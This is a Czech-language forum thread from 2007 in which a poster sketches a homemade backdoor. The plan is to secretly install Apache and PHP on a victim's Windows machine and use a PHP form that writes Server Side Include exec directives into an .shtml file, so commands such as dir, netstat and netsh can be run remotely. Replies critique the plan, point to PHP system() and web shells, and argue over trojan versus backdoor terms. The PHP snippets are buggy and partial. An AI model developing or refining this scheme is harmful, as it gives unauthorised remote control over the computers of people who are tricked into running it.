| Zdravim. SSI (Script Side Includes), tedy "vsuvky na straně serveru".
Zaujal mě tento příkaz:
<!--#exec cmd="dir"-->
Takto tedy můžeme spustit na serveru libovolný proram a jeho výsledek se nám případně zobrazí.
Napadlo mě, a případně mě vyveďte z omylu, zda by to nešlo použít jako trojský kůň, kdy bych oběti mohl pomoci protokolu http spouštěl na počítači (serveru) libovolný program nebo cmd.exe a vykonat libovolný köd.
Stačilo by vzít jednoduchý a malý PHPclový serev (Apache), sbalit ho se skriptem, který by ho někde nasinstaloval (např. do system32), napsat k tomu instalačku, celý to sbalit (přes iexpress.exe) a poslat oběti. Pokud si to spustí tak ji to do system32 nahraje Apache, spustí, a vytvoří soubor index.php, ve které mude tohle:
<form action="index.php" metohd="post">
<inpu type="text" name="text">
<input type="button" value="odelsat">
</form>
<?php
$text;
$soubor=fopen("soubor.shtml","a+");
fwrite($soubor,$text);
fclose($soubor);
?>
no a já bych samozřejmě oběti poslal do txt pole tohle:
<!--#exec cmd="dir"-->
no a potom bych si v exploreru otevřel:
http://IPadresa_obeti/text.shtml
a zobrazil by semi výpis adrsáře aktuální složky oběti:))
Samozžejmě bych taklhe mohl spouštět i jiný příkazy:
netstat
netsh firewall.....apod.
Takže moje otázka--->šlo by to takhle nebo je to kravina:))
htrans
(odpovědět) | htrans | 158.194.29.* | 15.9.2007 11:12 |
|
|
|
| Pominu-li fakt, ze napr. ten PHP kod je nefunkcni, tak to mozne to je. Ale je to dosti "zajimavy" zpusob (tezce konfigurovatelne, moc prace, velky soubor bys musel dostat k obeti, snadna odhalitelnost, ...) a existuji mnohem sofistikovanejsi a vhodnejsi metody, jak na cilovem stroji spoustet svoje prikazy. (odpovědět) | HC | 193.85.29.* | 15.9.2007 12:47 |
|
|
|
| No já jsem asi lama ne protoze jsem napsal ten dotaz, ale protoze jsem nepredpokladal, ze me stim poslete do___ele.
No aspon, ze vim ze by to fungovalo.A co se týká máho PHPcka tak:
index.php
<form action="form.php" method="post">
<input type="text" name="text">
<input type="submit" value="odelsat">
form.php
<?
$text;
$soubor=fopen("soubor.shtml","a+");
fwrite($soubor,$text);
fclose($soubor);
?>
nevim proc by to nemelo fungovat, ovsem pokud ten komu se to nezda neni sm lama:) ze:)
me to takhle jede bez problémů:))
(odpovědět) | htrans | 158.194.29.* | 15.9.2007 16:56 |
|
|
|
| Pred tim by to nefungovalo, protoze jsi nenapsal co je index.php a co je form.php
----------
*´¨)
¸.·´¸.·´¨)
(¸.·´ (¸.·*´`*·>>> [link] <<< (odpovědět) | |
|
|
| Hadate se kvuli nesmyslu.
htrans: Na tom tvem napadu prakticky funguji PHP web shells. Ty jsi to jen rozsiril o moznost instalace serveru. Ovsem v jednom ma XYZ pravdu: Bez verejne IP to asi nepujde(slo by to za predpokladu ze by se ten skript pokusil navazat spojeni na nejaky tvuj web a prikazy si stahl z textaku; ale to uz rovnou muzes pouzit trojskeho kone) (odpovědět) | RubberDuck. | 85.71.165.* | 15.9.2007 19:35 |
|
|
|
| No jasne, nainstaluj ke svy objeti rovnou celej apache i s phpkem...
Pak ale nechapu, proc nepouzijes volani php funkce system()... (odpovědět) | Harvie. | 213.220.241.* | 16.9.2007 23:19 |
|
|
|
| jo a kdyz ti vadi, ze bych obeti na PC instaloval rovnou Apache, tak kdyz jsi takovy programator, tak napis nejaky PHPckovy server, malý, nenápadný, který by bezel pekne ve skrytém rezimu a dej ho sem ke stazení:))já něco takovyho neumim naprogramovat (zatim:)) , ale pokud byste to někdo svedl, bylo by to pak uplně a oněčem jiným a "SSI Trojský kůň" nebo SSI backdoor nebo jak tomu budem říkat už by nebylo problém vyrobit a já bych pak videl jediný problém ve firewallu, který by komunikaci mohl bloknout....(jo a taky verejna IP)
htrans (odpovědět) | htrans | 158.194.29.* | 17.9.2007 10:13 |
|
|
|
|
| Jo a btw by sis mel precist recky povesti a baje a pripadne take anglicky slovnik, abys pochopil jaky je rozdil mezi trojakem a backd00rem. (odpovědět) | Harvie. | 213.220.241.* | 16.9.2007 23:21 |
|
|
|
| Dik za upresnení:)takze je to spis backdoor? Ja vim, ze je v tom rozdil, ale neni to snad jedno? (odpovědět) | htrans | 158.194.29.* | 17.9.2007 10:06 |
|
|
|
|
| Trojsky kun je aplikace, ktera na pozadi provadi jinou cinnost, nez prezentuje oficialne(napriklad: keylogging).
BackDoor je aplikace umoznujici opetovny nepozorovany navrat do napadeneho systemu. (odpovědět) | RubberDuck. | 85.71.165.* | 17.9.2007 16:01 |
|
|
|
| jj, ja znam rozdil mezi TK a backdoorem, ja jenn, ze kdyz jsem to pojmenoval, tak jsem nad tim zas tak moc neuvazoval:)) (odpovědět) | htrans | 158.194.29.* | 18.9.2007 12:39 |
|
|
|
| hh :) no dost zabavny napad ked vezmem do uvahy ze na to aby si nainstaloval take nieco ako je apache + php na pocitac nenapadne by si radsej mohol nainstalovat nejaky ten backdoor a nemusel by si sa SRAT (sry za vyraz) s celim serverom ;) ale napad je to vcelku dost zabavny :P
Ak by si to skusil tak daj vedet ako to dopadlo ;) (odpovědět) | ChreNik v scurvenej scole | 87.197.4.* | 20.9.2007 15:01 |
|
|
|